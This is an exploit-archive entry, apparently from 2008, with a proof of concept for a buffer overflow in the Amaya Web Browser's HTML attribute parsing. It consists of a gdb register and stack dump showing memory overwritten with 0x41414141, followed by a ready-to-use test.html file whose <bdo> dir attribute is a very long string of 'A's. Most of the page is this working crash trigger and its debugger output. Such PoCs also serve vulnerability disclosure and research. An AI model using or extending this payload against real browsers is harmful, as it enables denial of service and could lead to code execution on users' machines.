[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Amaya Web Browser 10.0.1/10.1-pre5 (html tag) Buffer Overflow PoC
# Published : 2008-12-15
# Author : webDEViL
# Previous Title : Avahi < 0.6.24 (mDNS Daemon) Remote Denial of Service Exploit
# Next Title : Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 Local DoS Exploit
Amaya Web Browser html tag overflow (quite a few tags are vulnerable)
(gdb) i r
eax 0x41414141 1094795585
ecx 0x0 0
edx 0xbfc0ff80 -1077870720
ebx 0x9ec1220 166466080
esp 0xbfc10064 0xbfc10064
ebp 0xbfc10268 0xbfc10268
esi 0xa2f64a0 170878112
edi 0xbfc10160 -1077870240
eip 0x8144b40 0x8144b40 <EndOfHTMLAttributeValue(char*, _AttributeMapping*, int*, int*, bool, _ParserData*, bool)+2352>
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) x/10x $ebp
0xbfc10268: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfc10278: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfc10288: 0x41414141 0x41414141
#cat test.html
<bdo dir="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" >webDEViL</bdo>
# www.Syue.com [2008-12-15]